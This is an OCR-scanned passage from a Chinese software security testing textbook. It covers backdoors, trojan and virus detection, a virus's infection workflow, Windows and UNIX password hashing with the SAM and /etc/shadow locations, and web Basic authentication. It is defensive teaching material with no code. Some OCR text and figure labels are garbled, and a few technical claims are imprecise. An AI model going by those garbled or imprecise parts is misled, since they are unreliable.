3. 扩展 后 门 : 所 谓 的 “扩展 ”， 是 指 在 功能 上 有 大 的 提升 ， 比 普通 的 单一 功能 的 后 门 
有 很 强 的 使 用 性 ， 这 种 后 门 本 身 就 相当 于 一 个 小 的 安全 工具 包 ， 能 实现 非常 多 的 常见 安全 功 
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能 ， 适 合 新 手 使 用 。 
4. CIS 后 门 : 采用 “客户 端 /服务 器 端 ” 的 控制 方式 ， 通 过 某 种 特定 的 访问 方式 来 启动 
后 门 进而 控制 服务 器 。 
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木马 与 后 门 程序 的 检测 及 预防 


木马 和 后 门 程序 的 检测 很 大 程度 上 依赖 于 它们 出 现时 间 的 长 短 及 其 欺骗 手段 的 应 用 。 比 
较 古 老 的 木马 ， 绝 大 多 数 都 能 够 被 各 种 反 病毒 工具 或 防火 墙 工具 依据 其 特征 检测 到 ， 新 的 木 
马 和 后 门 程序 可 能 会 持续 很 长 时 间 不 被 检测 到 。 检测 恶意 软件 的 工具 有 很 多 , 常用 工具 包括 : 
MDS 检查 、 监 控 本 地 端口 、 监 控 远 程 端口 、 反 病毒 和 反 木 马 扫描 器 以 及 入 侵 检 测 系统 。 

预防 木马 和 后 门 攻 击 终究 归结 为 持续 地 监视 系统 。 下 面 是 一 些 应 该 采取 的 预防 措施 : 


6.2.1 


il 


安装 补丁 ， 及 时 安装 系统 及 应 用 软件 的 补丁 可 以 保持 这 些 软件 处 于 最 新 状态 ， 同 时 
也 修复 了 最 新 发 现 的 漏洞 。 通 过 漏洞 修复 ， 最 大 限度 地 降低 了 漏洞 利用 型 木马 在 系 
统 上 植 入 的 可 能 性 。 

安装 入 侵 检测 系统 : 入 侵 检测 系统 (IDS) 并 不 能 够 真正 地 防止 木马 或 后 门 程序 ， 但 这 
些 系统 有 助 于 检测 这 类 恶意 软件 。 检 测 到 ICMP 和 端口 扫描 是 即将 受到 攻击 的 第 一 
个 信号 ， 管 理 员 应 该 警惕 未 来 可 能 受到 的 攻击 。 

安装 反 病 毒 和 反 木 马 扫描 器 : 此 类 软件 包 本 身 并 不 能 防止 攻击 ， 而 只 能 检测 已 经 安 
装 在 系统 中 的 恶意 软件 。 但 是 ， 利 用 这 些 软 件 提供 的 功能 ， 有 助 于 防止 未 来 可 能 发 
生 的 攻击 ， 或 者 删除 系统 中 已 经 存在 的 感染 程序 。 

安装 防火 墙 ， 安 装 防火 墙 能 够 大 大 增加 攻击 者 攻击 成 功 的 难度 。 仅 开放 绝对 需要 
的 端口 ， 关 闭 其 他 所 有 端口 ， 这 样 将 自己 暴露 在 互联 网 上 的 横 截 面 减少 到 最 低 限 
度 。 但 是 ， 当 木马 成 功 地 获取 防火 墙 保护 的 主机 或 系统 的 访问 之 后 ， 防 火 墙 就 形 
同 虚 设 了 。 

安装 基于 主机 的 入 侵 检测 系统 ， 这 类 软件 包 监 视 所 有 应 用 程序 的 活动 和 进出 计算 机 
的 每 一 个 连接 。 基 于 主机 的 入 侵 检测 系统 通常 允许 核准 或 拒绝 程序 的 执行 及 控制 哪 
些 应 用 程序 能 够 访问 互联 网 。 

培养 风险 意识 ， 通 过 对 自己 及 员工 的 风险 培训 ， 能 够 大 大 降低 成 为 牺牲 品 的 风险 。 
告诉 每 一 个 人 避免 安装 可 疑 软件 或 从 互联 网 上 下 载 软件 ， 仔 细 观 察 任何 不 寻常 的 程 
序 或 进程 (要 查看 进程 , 可 使 用 Windows 任务 管理 器 , 也 可 以 使 用 其 他 进程 查看 软件 )。 
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计算 机 病毒 概述 
算 机 病毒 (Computer Virus) 在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 被 明 


确定 义 , 病毒 指 " 编 制 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 , 影响 计算 机 使 


用 并 且 


能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 
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计算 机 病毒 不 是 天 然 存在 的 ， 它 是 利用 计算 机 软件 和 硬件 所 固有 的 脆弱 性 编制 的 一 组 指 
令 集 或 程序 代码 。 它 能 潜伏 在 计算 机 的 存储 介质 (或 程序 ) 里 ， 条 件 满足 时 即 被 激活 ， 通 过 修 
改 其 他 程序 的 方法 将 自己 的 精确 拷贝 或 者 可 能 演化 的 形式 放 入 其 他 程序 中 。 从 而 感染 其 他 程 
序 ， 对 计算 机 资源 进行 破坏 ， 并 且 通 过 传播 影响 其 他 计算 机 系统 。 

计算 机 病毒 通常 会 消耗 内 存 以 及 磁盘 空间 ， 破 坏 硬盘 、 电 脑 数据 ， 乱 发 垃圾 邮件 以 致 网 
络 瘫痪 等 。 计 算 机 病毒 主要 具有 以 下 特征 : 

1. 繁殖 性 : 计算 机 病毒 可 以 像 生物 病毒 一 样 进行 繁殖 ， 当 正常 程序 运行 时 ， 它 也 进行 运 
行 自身 复制 ， 是 否 具 有 繁殖 、 感 染 的 特征 是 判断 某 段 程序 为 计算 机 病毒 的 首要 条 件 。 

2. 破坏 性 : 计算 机 中 毒 后 ,可 能 会 导致 正常 的 程序 无 法 运行 , 把 计算 机 内 的 文件 删除 或 
受到 不 同 程度 的 损坏 。 破 坏 引导 扇 区 及 BIOS， 硬 件 环境 破坏 。 

3. 传染 性 : 计算 机 病毒 的 传染 性 是 指 计算 机 病毒 通过 修改 别 的 程序 将 自身 的 复制 品 或 其 
变 体 传染 到 其 他 无 毒 的 对 象 上 ， 这 些 对 象 可 以 是 一 个 程序 也 可 以 是 系统 中 的 某 一 个 部 件 。 

4. 潜伏 性 : 计算 机 病毒 的 潜伏 性 是 指 计算 机 病毒 可 以 依附 于 其 他 媒体 寄生 的 能 力 , 侵入 
后 的 病毒 潜伏 到 条 件 成 熟 才 发 作 ， 会 使 电脑 变 慢 。 

5. 隐蔽 性 ; 计算 机 病毒 具有 很 强 的 隐蔽 性 ， 可 以 通过 病毒 软件 检查 出 来 少数 ， 隐 蔽 性 计 
算 机 病毒 时 隐 时 现 、 变 化 无 常 ， 这 类 病毒 处 理 起 来 非常 困难 。 

6. 可 触发 性 :病毒 的 编写 者 一 般 都 为 病毒 程序 设 定 了 一 些 触 发 条 件 ， 例 如 ， 系 统 时 钟 
的 某 个 时 间或 日 期 、 系 统 运行 了 某 些 程序 等 。 一 旦 条 件 满足 ， 计 算 机 病毒 就 会 “发 作 ”， 使 系 
统 遭 到 破坏 。 

计算 机 病毒 按照 传染 方式 可 分 为 以 下 几 类 : 

L 引导 区 型 病毒 ， 此 种 病毒 利用 系统 引导 时 ， 不 对 主 引导 区 的 内 容 正 确 与 否 进行 判别 
的 缺点 ， 在 引导 型 系统 的 过 程 中 侵入 系统 ， 驻 留 内 存 ， 监 视 系统 运行 ， 待 机 传染 和 破坏 。 

2 文件 型 病毒 :文件 型 病毒 是 对 计算 机 的 源 文件 进行 修改 ， 使 其 成 为 新 的 带 毒 文件 。 
一 旦 计算 机 运行 ， 该 文件 就 会 被 感染 ， 从 而 达到 传播 的 目的 。 它 运行 在 计算 机 存储 器 中 ， 通 
常 感染 扩展 名 为 COM、EXE、SYS 等 类 型 的 文件 。 

3. 混合 型 病毒 ， 它 具有 引导 区 型 病毒 和 文件 型 病毒 两 者 的 特点 。 

4. 宏 病 毒 : 宏 病毒 是 一 种 寄存 在 文档 或 模板 的 宏 中 的 计算 机 病毒 ,一 旦 打开 这 样 的 文档 ， 
其 中 的 宏 就 会 被 执行 ， 于 是 宏 病 毒 就 会 被 激活 ， 转 移 到 计算 机 上 ， 并 驻 留 在 Normal 模板 上 。 
如 我 们 常见 的 office 宏 病 毒 。 

。 我 们 还 可 以 依据 病毒 的 连接 方式 进行 分 类 : 

1. 源码 型 病毒 : 攻击 高 级 语言 编写 的 源 程序 ， 在 源 程序 编译 之 前 插入 其 中 ， 并 随 源 程序 
一 起 编译 、 连 接 成 可 执行 文件 。 源 码 型 病毒 较为 少见 ， 亦 难以 编写 。 

2. 入 侵 型 病毒 : 可 用 自身 代替 正常 程序 中 的 部 分 模块 或 堆栈 区 。 因 此 这 类 病毒 只 攻击 某 
些 特定 程序 ， 针 对 性 强 。 这 种 病毒 难以 被 发 现 ， 清 除 起 来 也 较 困 难 。 

3. 操作 系统 型 病毒 : 可 用 其 自身 部 分 加 入 或 替代 操作 系统 的 部 分 功能 。 因 其 直接 感染 操 
作 系 统 ， 所 以 危害 性 也 较 大 。 

4 外 壳 型 病毒 : 通常 将 自身 附 在 正常 程序 的 开头 或 结尾 , 相当 于 给 正常 程序 加 了 个 外 这。 
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大 部 分 的 文件 型 病毒 都 属于 这 一 类 。 
622 ”计算 机 病毒 的 工作 原理 


要 了 解 计算 机 病毒 的 工作 原理 ， 首 先 就 要 了 解 它 的 逻辑 结构 。 一 个 计算 机 病毒 通常 
个 模块 组 成 : 引导 模块 、 感 染 模块 、 破 坏 模 块 。 下 面 我 们 将 从 它们 在 病毒 执行 中 完成 的 动作 
及 作用 来 详细 介绍 。 
引导 模块 : 染 毒 程序 运行 时 ， 首 先 运行 的 是 病毒 的 引导 模块 。 它 的 作用 是 检查 运行 的 环 
境 ， 如 确定 操作 系统 类 型 、 内 存 容 量 、 现 行 区 段 、 磁 盘 设置 、 显 示 器 类 型 等 参数 ， 将 病毒 引 
入 内 存 ， 等 待 执行 ， 并 保护 内 存 中 的 病毒 代码 不 被 覆盖 ， 设 置 病毒 的 激活 条 件 和 触发 条 件 ， 
使 病毒 处 于 可 激活 态 ， 以 便 病 毒 被 激活 后 根据 满足 的 条 件 调 用 感染 模块 或 破坏 表现 模块 。 

感染 模块 : 是 病毒 实施 感染 动作 的 部 分 ， 负 责 实 现 病毒 的 感染 机 制 。 它 的 作用 是 寻找 感 
染 目标 ， 检 查 目标 中 是 否 存在 感染 标志 或 设 定 的 感染 条 件 是 否 满足 ， 如果 没 有 感染 标志 或 条 
件 满足 ， 进 行 感染 ， 将 病毒 代码 放 入 宿主 程序 。 无 论 是 文件 型 病毒 还 是 引导 型 病毒 ， 其 感染 
过 程 总 的 来 说 是 相似 的 ， 分 为 三 步 : 进驻 内 存 、 判 断 感 染 条 件 、 实 施 感染 。 

破坏 模块 : 负责 实施 病毒 的 破坏 动作 ， 其 内 部 是 实现 病毒 编写 者 预定 破坏 动作 的 代码 ; 
它 的 作用 是 通过 控制 触发 条 件 控制 病毒 的 破坏 动作 ， 控 制 病 毒 破坏 的 频率 ， 使 病毒 在 隐蔽 的 
状态 下 实施 感染 。 破 坏 模 块 导致 各 种 异常 现象 ， 因 此 ， 该 模块 又 被 称 为 病毒 的 表现 模块 。 计 
算 机 病毒 的 工作 流程 如 图 6-1 所 示 : 


满足 满足 
n 4x 后 dd 
F 感染 条 件 ? rd 激活 条 件 ? ax 


Bs 


eh ee eae] 
满足 


不 满足 
潜伏 或 消散 
图 6-1 计算 机 病毒 的 工作 流程 图 


从 图 6-1 可 以 看 出 ， 一 个 计算 机 病毒 需要 通过 引导 模块 装 入 内 存 ， 寻 找 感染 目标 ， 在 触 
发 条 件 满足 时 ， 由 破坏 模块 实施 病毒 的 破坏 动作 。 图 中 的 “静态 "是 指 病毒 尚未 被 加 载 、 尚 未 
进入 内 存 ， 当 病毒 完成 初始 引导 ， 进 入 内 存 后 就 是 “动态 ”。 

从 病毒 的 生命 周期 来 分 析 ， 病 毒 一 般 经 历 4 个 阶段 : 

Q 潜伏 阶段 病毒 程序 处 于 休眠 状态 ; 


*240* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


@ 传染 阶段 :传染 其 他 程序 一 一 将 自身 程序 复制 到 其 他 程序 或 者 磁盘 的 某 个 区 域 ; 

@ 触发 阶段 :病毒 执行 某 种 特定 功能 从 而 达到 既定 目标 ; 

© 发 作 阶段 : 病毒 为 了 既定 目标 而 运行 (如 : 破坏 文件 、 传 染 其 他 程序 等 )。 

在 潜伏 阶段 ， 病 毒 程序 处 于 休眠 状态 ， 用 户 根本 感觉 不 到 病毒 的 存在 ， 但 并 非 所 有 病毒 
均 会 经 历 潜伏 阶段 。 如 果 某 些 事件 发 生 ( 如 特定 的 日 期 、 某 个 特定 的 程序 被 执行 等 )， 病 毒 就 
会 被 激活 ， 并 从 而 进入 传染 阶段 。 处 于 传染 阶段 的 病毒 ， 将 传染 其 他 程序 一 一 将 自身 程序 复 
制 到 其 他 程序 或 者 磁盘 的 某 个 区 域 上 。 经 过 传染 阶段 ， 病 毒 程序 已 经 具备 运行 的 条 件 ， 一 旦 
病毒 被 激活 ， 则 进入 触发 阶段 。 

我 们 再 以 有 名 的 “求职 信 ” 病 毒 为 例 分 析 病 毒 的 工作 原理 及 流程 。“ 求 职 信 ”病毒 是 一 种 
Windows 病毒 ， 它 的 代码 编制 采用 Windows 病毒 编制 技术 ,解密 后 的 代码 长 度 为 258Hb， 病 
毒 程序 首先 自 解密 , 然后 在 内 存 中 查找 KERNEL32 模块 , 并 根据 名 字 的 检验 字 找到 一 大 批 函 
数 入 口 ， 这 些 函 数 供 后 面 的 代码 调用 ， 接 下 来 ， 申 请 内 存 ， 将 所 有 病毒 代码 复制 到 申请 的 内 
存 中 ， 并 转 至 申请 的 内 存 中 执行 ， 这 时 ， 该 段 代 码 首 先 检 查 有 无 调试 程序 ， 如 在 调试 程序 下 
和 运行， 终止 病毒 代码 ， 返 回 到 原宿 主 程序 (如 果 是 配套 的 木马 ， 则 返回 到 操作 系统 )， 并 启动 
感染 代码 ， 如 未 在 调试 程序 下 运行 ， 则 感染 System 目录 或 建立 wqk.exe(Windows 9x 下 ) 或 
wqk.dll(Windows NT 下 )。 然 后 将 当前 进程 注册 为 服务 进程 ， 创 建 感染 线程 ， 根 据 系统 时 间 ， 
如 果 为 13 号 且 为 3 月 或 9 月 , 则 感染 所 有 硬盘 或 网 络 盘 文件 ; 否则 感染 系统 目录 。 某 些 条 件 
下 创建 的 感染 线程 会 启动 另 一 个 感染 线程 ， 直 到 系统 崩溃 。 如 果 是 Windows NT 操作 系统 ， 
则 同时 感染 所 有 网 络 邻居 。 最 后 返回 宿主 程序 或 操作 系统 。 


6.23 ”计算 机 病毒 的 检测 与 预防 


计算 机 病毒 的 危害 是 显而易见 的 ， 我 们 在 平时 如 何 对 病毒 进行 有 效 监测 和 预防 呢 ? 这 就 
需要 对 计算 机 感染 计算 机 病毒 的 征兆 有 所 了 解 , 并且 掌握 行 之 有 效 的 预防 和 清除 病毒 的 方法 。 
感染 计算 机 病毒 的 常见 征兆 如 下 : 

1. 系统 运行 速度 忽然 变 慢 ; 

2. 程序 及 文件 载 入 时 间 变 长 ; 

3. 磁盘 标号 被 自动 改写 、 出 现 异常 文件 、 出 现 固 定 的 坏 扇 区 、 可 用 磁盘 空间 变 小 、 文 件 
无 故 变 大 、 失 踪 或 被 改 乱 、 可 执行 文件 (exe) 变 得 无 法 运行 等 ; 

4. 屏幕 上 出 现 不 应 有 的 特殊 字符 或 图 像 、 字 符 无 规则 变化 或 脱落 、 静 止 、 深 动 、 雪 花 、 
跳动 、 小 球 亮点 、 英 名 其 妙 的 信息 提示 等 ; 

5. 硬盘 灯 常 亮 或 者 机 箱 发 出 尖 叫 、 蜂 鸣 音 或 非 正 常 奏 乐 等 。 

6. 系统 内 存 占用 急剧 上 升 ; 

7. 可 执行 文件 无 故 改变 ; 
8 
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.进程 列表 异常 ; 

.经常 无 故 死 机 ， 随 机 地 发 生 重 新 启动 或 无 法 正常 启动 ; 

10. 硬件 设备 突然 变 为 无 效 设备 ; 

计算 机 病毒 的 预防 技术 是 指 通过 一 定 的 技术 手段 防止 计算 机 病毒 对 系统 的 传染 和 破坏 。 
实际 上 这 是 一 种 动态 判定 技术 ， 即 一 种 行为 规则 判定 技术 。 也 就 是 说 ， 计 算 机 病毒 的 预防 是 
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采用 对 病毒 的 规则 进行 分 类 处 理 ， 而 后 在 程序 运作 中 凡 有 类 似 的 规则 出 现 则 认定 是 计算 机 病 
毒 。 具 体 来 说 ， 计 算 机 病毒 的 预防 是 通过 阻止 计算 机 病毒 进入 系统 内 存 或 阻止 计算 机 病毒 对 
磁盘 的 操作 ， 尤 其 是 写 操作 。 预 防 病毒 技术 包括 : 磁盘 引导 区 保护 、 加 密 可 执行 程序 、 读 写 
控制 技术 、 系 统 监控 技术 等 。 例 如 ， 大 家 所 熟悉 的 防 病毒 卡 ， 其 主要 功能 是 对 磁盘 提供 写 保 
护 ， 监 视 在 计算 机 和 驱动 器 之 间 产 生 的 信号 。 以 及 可 能 造成 危害 的 写 命令 ， 并 且 判 断 磁盘 当 
前 所 处 的 状态 : 哪 一 个 磁盘 将 要 进行 写 操作 ,是否 正在 进行 写 操作 ， 磁 盘 是 否 处 于 写 保护 等 ， 
来 确定 病毒 是 否 将 要 发 作 。 计 算 机 病毒 的 预防 应 用 包括 对 已 知 病毒 的 预防 和 对 未 知 病毒 的 预 
防 两 个 部 分 。 目 前 ， 对 已 知 病毒 的 预防 可 以 采用 特征 判定 技术 或 静态 判定 技术 ， 而 对 未 知 病 
毒 的 预防 则 是 一 种 行为 规则 的 判定 技术 ， 即 动态 判定 技术 

计算 机 病毒 清除 技术 是 计算 机 病毒 检测 技术 发 展 的 必然 结果 ， 是 计算 机 病毒 传染 程序 的 
一 种 逆 过 程 。 目 前 ， 清 除 病毒 大 都 是 在 某 种 病毒 出 现 后， 通过 对 其 进行 分 析 研 究 而 研制 出 来 
的 具有 相应 解毒 功能 的 软件 。 这 类 软件 技术 发 展 往往 是 被 动 的 ， 带 有 滞后 性 。 而 且 由 于 计算 
机 软件 所 要 求 的 精确 性 ， 解 毒 软件 有 其 局 限 性 ， 对 有 些 变 种 病毒 的 清除 无 能 为 力 。 

在 我 们 日 常 学 习 、 工 作 中 应 该 养 成 良好 的 习惯 以 降低 感染 计算 机 病毒 的 几率 ， 如 : 不 轻 
易 打 开 来 历 不 明 的 电子 邮件 ， 使 用 新 的 计算 机 系统 或 软件 时 ， 先 杀毒 后 使 用 ， 备 份 系统 和 参 
数 ， 建 立 系统 的 应 急 计 划 ; 安装 杀毒 软件 ， 分 类 管理 数据 等 。 


6.3 口令 


在 计算 机 发 明之 前 ， 企 业 和 政府 机 构 使 用 门 锁 和 文件 柜 来 保护 数据 的 安全 ， 而 且 这 种 物 
理 安全 让 人 感觉 很 放心 。 现 在 ， 通 过 网 络 能 够 在 任何 地 方 访问 企业 的 数据 ， 物 理 安全 已 经 不 
能 对 数据 提供 足够 的 保护 了 。 这 样 ， 企 业 和 政府 机 构 就 开始 转向 采用 访问 控制 来 保护 自己 的 
数据 。 强 健 的 访问 控制 至 少 应 该 采用 下 述 方法 中 的 两 种 方法 : 

。 被 认证 者 知道 的 东西 :个 人 身份 号 码 或 口令 ; 

e 被 认证 者 拥有 的 东西 :SecureID F; 

€ 被 认证 者 是 谁 ， 生 物 特征 ; 

。 被 认证 者 做 的 事情 : 在 我 们 签名 时 监视 笔尖 压力 的 变化 。 

双 因 素 安全 是 指 至 少 采 用 上 述 两 种 控制 方式 的 访问 控制 ， 如 通过 指纹 和 口令 进行 访问 授 
权 。 四 因素 认证 则 包含 了 所 有 四 个 认证 方面 。 然 而 ， 绝 大 多 数 应 用 依然 使 用 最 弱 的 安全 认证 
方式 一 一 仅 使 用 口令 的 单 因素 认证 。 由 于 同时 使 用 了 用 户 名 和 口令 ， 人 们 往往 认为 这 就 是 使 
用 了 双 因 素 认 证 ， 但 用 户 名 和 口令 方式 的 认证 仍 是 一 种 单 因素 认证 ， 因 为 它 仅仅 基于 人 们 所 
知道 的 东西 。 

口令 提供 了 最 弱 的 安全 认证 方式 ， 原 因 在 于 人 们 可 以 通过 破解 猜测 出 口令 ， 而 作为 渗透 
测试 人 员 ， 也 应 该 知道 口令 破解 的 方法 。 人 们 之 所 以 雇佣 渗透 测试 人 员 进行 口令 破解 经 常 是 
出 于 下 述 两 个 理由 之 一 : 策略 审计 和 口令 恢复 。 

当 出 于 策略 审计 目的 进行 口令 破解 时 ， 测 试 人 员 试图 确定 企业 是 否 强 制 实施 了 其 口令 策 
略 。 比 如 ， 假 定 企业 安全 策略 中 有 一 条 ， 要 求 口令 必须 是 8 个 字符 长 ， 并 使 用 字母 数字 的 组 
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合 ， 那 么 口令 b62ki9d6 就 是 这 个 策略 下 的 一 个 强 口令 。 如 果 对 企业 的 口令 测试 中 发 现 只 有 
80% 的 口令 符合 企业 设 定 的 策略 ， 那 么 渗透 测试 人 员 就 可 以 告知 企业 这 样 的 策略 没有 在 企业 
中 得 到 彻底 贯彻 。 另 外 ， 当 公司 的 系统 管理 员 离开 企业 且 没 有 任何 人 知道 管理 员 账 户 的 口令 
时 ， 企 业 就 可 能 雇佣 渗透 测试 人 员 来 破解 管理 员 的 口令 。 

口令 破解 的 方法 及 工具 有 很 多 ， 本 节 首 先 介绍 口令 在 不 同 操作 系统 中 的 加 密 和 存储 方 
式 ， 之 后 概要 描述 一 些 最 常用 的 口令 破解 工具 ， 最 后 说 明 一 些 避 免 口 令 被 恶意 破解 的 技巧 。 


6.8.1. 操作 系统 口令 加 密 及 存储 技术 


口令 通过 只 允许 知道 口令 的 人 访问 系统 的 方式 来 保护 系统 的 安全 。 一 般 情况 下 ， 用 户 需 
要 通过 认证 和 授权 两 个 阶段 对 系统 进行 访问 。 其 中 ， 第 一 阶段 确定 用 户 身份 ， 第 二 阶段 确定 
用 户 的 操作 权限 。 在 这 两 个 阶段 中 ， 以 明文 或 密 文 形式 将 口令 发 送 给 系统 都 是 可 以 的 ， 但 
于 明文 发 送 方式 的 安全 性 较 低 ， 所 以 常 采用 密 文 形 式 发 送 口令 ， 而 最 常用 的 加 密 方法 就 是 散 
列 法 。 

在 介绍 使 用 不 同 工 具 破 解 口令 之 前 ,需要 理解 口令 是 如 何 加 密 的 。 由 于 Windows 和 UNIX 
是 市 场 上 最 流行 的 两 个 服务 器 ， 因 此 我 们 只 讨论 这 两 种 操作 系统 下 的 口令 实现 技术 。 这 两 个 
系统 的 主要 差别 是 : UNIX 及 其 各 种 变 体 (包括 Linux) 在 加 密 口令 时 使 用 了 加 盐 ( 加 密 前 在 口令 
中 添加 的 一 个 随机 字符 串 )， 而 Microsoft Windows 服务 器 则 没有 加 密 ， 这 就 是 Windows 口令 
相对 更 容易 破解 的 原因 之 一 。 

1. 微软 口令 散 列 


Windows 散 列 和 LNMAN 散 列 是 微软 推出 的 两 种 口令 散 列 。 

Windows 散 列 的 第 一 步 是 将 口令 转换 成 Unicode 编码 。Unicode 是 一 种 用 唯一 的 数字 表 
示 每 一 个 字符 的 编码 方法 ， 适 用 于 各 种 语言 和 平台 。 这 种 编码 提供 了 字符 的 一 致 编码 手段 ， 
开发 人 员 可 使 用 Unicode 编码 在 一 种 语言 中 编写 程序 或 页 面 ， 而 在 男 一 种 语言 中 轻易 地 阅读 
它们 ,比如 , 大 写字 母 A 的 Unicode 编码 为 0041, 在 第 一 步 完 成 后 , 用 MD4 算法 散 列 Unicode 
字符 串 形 式 的 口令 。MD4 算法 的 安全 性 比 MD5 算法 要 弱 ， 但 它 比 微软 用 于 加 密 口 令 的 
LANMAN 散 列 算法 要 强 一 些 。 

LANMAN 散 列 算法 从 NT3.5 引入 , 主要 用 于 向 后 兼容 性 。 当 口令 长 度 不 足 14 个 字符 时 ， 
它 在 口令 后 面 添 加 上 一 些 零 , 使 其 补足 到 14 个 字符 , 之 后 口令 被 转换 为 大 写字 母 ， 并 划分 为 
两 个 7 字符 组 。 如 果 口 令 长 度 不 超过 7 个 字符 ， 那 么 第 二 个 字符 组 中 的 所 有 字符 都 是 0， 在 
运行 加 密 算法 后 ， 所 有 都 是 0 的 字符 串 转换 为 0Xaad3B435B51404EE， 当 看 到 LANMAN O 
令 中 出 现 这 样 的 字符 串 时 ， 就 可 以 知道 它 对 应 的 口令 长 度 不 超过 7 个 字符 。 接 下 来 从 两 个 字 
符 组 中 分 别 计算 得 到 一 个 8 位 字 节 奇 校 验 的 DES 密 钥 ， 将 这 两 个 值 结合 在 一 起 ， 得 到 一 个 
16 字 节 的 单 向 散 列 值 。 由 于 在 破解 LANMAN 口令 时 一 次 只 需要 破解 7 个 字符 ， 因 此 这 种 口 
令 易 于 破解 。 比 如, 如 果 口 令 为 password123, 那么 破解 口令 时 只 需要 破解 出 password 和 d123 
即 可 ， 这 比 破解 出 字符 串 password123 容易 得 多 。 口 令 中 包含 的 字符 个 数 越 少 ， 破 解 速度 也 
就 越 快 。 

Windows 口令 存储 在 安全 账户 管理 数据 库 (SAM. Security Accounts ManageD 中 ， 其 文件 
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为 Windows 目录 下 的 \system32\config\SAM。 在 Windows 运行 过 程 中 ， 这 个 文件 SAMD 被 锁 
定 ， 但 该 文件 的 一 个 备份 保存 在 Windows 目录 下 的 \repair 目录 中 ， 并 在 每 次 运行 应 急 修复 实 
用 程序 (ERD) 时 更 新 。Windows 口令 破解 实用 程序 要 求 使 用 SAM 数据 库 。 

2. UNIX 口令 散 列 


UNIX 口令 比 Windows 口令 要 更 安全 一 些 。 在 UNIX 系统 中 ， 加 密 口令 时 使 用 了 加 盐 加 
密 技术 。 加 盐 加 密 是 一 种 对 系统 登录 口令 的 加 密 方 式 ， 它 实现 的 方式 是 将 每 一 个 口令 和 一 个 
称 为 “ 盐 ”(salb 的 mn 位 随机 数 相关 联 。UNIX 的 口令 文件 中 不 再 只 保存 加 密 过 的 口令 ， 而 是 
将 口令 和 随机 数 连接 起 来 ， 然 后 一 同 加 密 ， 加 密 后 的 结果 放 在 口令 文件 中 。 

UNIX 口令 使 用 DES 算法 对 口令 进行 25 次 循环 加 密 , 其 中 首次 加 密 是 使 用 全 0 的 64 位 
密 钥 ， 然 后 将 输出 值 加 盐 后 作为 后 续 24 次 加 密 的 输入 。 

在 所 有 类 UNIX 系统 中 ， 加 密 后 的 口令 通常 存储 在 /etc/shadow 文件 中 ， 更 旧 一 些 版 本 的 
系统 将 加 密 后 的 口令 存储 在 /etc/passwd 文件 中 。 


6.3.2 Web 系统 口令 认证 技术 


我 们 在 第 2 章 中 已 经 知道 认证 是 一 个 验证 身份 的 过 程 ， 常 用 的 认证 手段 是 使 用 用 户 名 和 
口令 ， 此 外 ， 也 可 以 使 用 能 够 起 到 认证 作用 的 任何 手段 ， 包 括 智 能 卡 、 虹 膜 扫 描 、 语 音 识别 
及 指纹 等 。Web 认证 中 ， 常 用 的 认证 方法 包括 : 基本 认证 、 数 字 认证 、NTLM 认证 、 证 书 认 
证 、 表 单 认 证 。 下 面 从 Web 应 用 的 角度 再 简单 介绍 一 下 这 些 认 证 方法 。 

1. 基本 认证 


基本 认证 (Basic Authentication) 是 最 简单 的 认证 方法 ， 也 是 很 长 时 间 以 来 应 用 最 广泛 的 认 
证 方法 。 基 本 认证 模式 的 模型 是 : 客户 端 必须 使 用 用 户 标识 和 口令 向 服务 器 说 明 自己 的 身份 。 

只 有 在 服务 器 确认 了 用 户 标识 和 口令 对 于 所 请 求 URL 的 指定 保护 空间 有 效 时 ， 它 才 会 
提供 所 需 的 服务 。 这 种 认证 没有 可 选 认证 参数 ， 为 了 得 到 授权 ， 客 户 端 发 送 赁 据 ， 和 凭据 由 
户 标识 和 口令 组 成 ， 中 间 使 用 冒号 () 分 隔 ， 之 后 使 用 BASE64 进行 编码 。 

基本 认证 具有 下 述 特点 : 

1) 基本 认证 是 Web 应 用 的 最 基本 认证 形式 ; 

2) 认证 凭据 以 BASE64 编码 形式 进行 编码 ， 以 明文 形式 进行 传输 ， 易 于 窃听 、 易 于 受 
到 重 放 攻 击 ; 

3) 使 用 128 位 SSL 加 密 可 挫败 攻击 。 

当 某 个 特定 资源 使 用 基本 认证 进行 保护 时 ， 为 了 通知 客户 端 必须 提供 用 户 凭据 ，HTTP 
服务 器 发 送 一 个 401 认证 请 求 头 ， 客 户 端 在 收 到 这 个 401 响应 头 时 ， 如 果 客 户 端的 浏览 器 支 
持 基 本 认证 ， 它 就 提示 用 户 输入 要 发 送 给 服务 器 的 用 户 名 和 口令 。 为 得 到 资源 ， 从 服务 器 上 
请 求 的 每 一 个 资源 都 必须 提供 认证 凭据 。 由 于 HITP 协议 是 一 种 无 状态 协议 ， 因 此 每 一 个 请 
求 都 以 相同 方式 处 理 ， 即 使 这 些 请 求 来 自 同 一 个 客户 端 。 客 户 端 浏览 器 缓冲 所 提供 的 用 户 名 
和 口令 , 并 与 认证 域 (Authentication Realm) 存 储 在 一 起 , 这 样 如 果 从 相同 域 中 请 求 其 他 资源 时 ， 
能 把 相同 的 用 户 名 和 口令 提供 给 服务 器 来 认证 请 求 ， 而 不 要 求 用 户 重 复 输入 它们 。 这 种 方式 


s 
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Ph， 浏览 器 能 区 分 不 同 站 点 的 私有 认证 域 。 

对 于 严格 的 安全 定义 来 说 ， 基 本 认证 不 应 该 被 认为 是 安全 的 。 尽 管 口令 以 加 密 形式 存储 
在 服务 器 上 ， 但 它 以 明文 形式 通过 网 络 从 客户 端 传输 到 服务 器 上 。 使 用 任何 一 款 包 嗅 探 器 就 
能 够 捕获 明文 传输 的 用 户 名 和 口令 。 另 外 ， 每 一 个 访问 请 求 都 要 传递 用 户 名 和 口令 ， 而 不 仅 
是 在 第 一 次 时 这 样 做 。 因 此 ， 包 嗅 探 器 不 必 侦 听 特 定 的 时 刻 ， 只 要 侦 听 的 时 间 足 够 长 ， 就 能 
获得 用 户 名 和 口令 。 此 外 ， 数 据 本 身 也 以 明文 形式 在 网 络 上 传送 ， 如 果 网 站 中 包含 了 敏感 信 
息 ， 那 么 包 嗅 探 器 同样 能 捕获 这 些 信息 ， 从 而 造成 敏感 信息 泄露 。 

2. 摘要 认证 (Digest Authentication) 


摘要 认证 与 基础 认证 的 工作 原理 很 相似 , 用 户 先 发 出 一 个 没有 认证 证 书 的 请 求 ，Web 服 
务 器 回复 一 个 带 有 WWW-Authenticate 头 的 响应 ， 指 明 访 问 所 请 求 的 资源 需要 证 书 。 但 是 和 
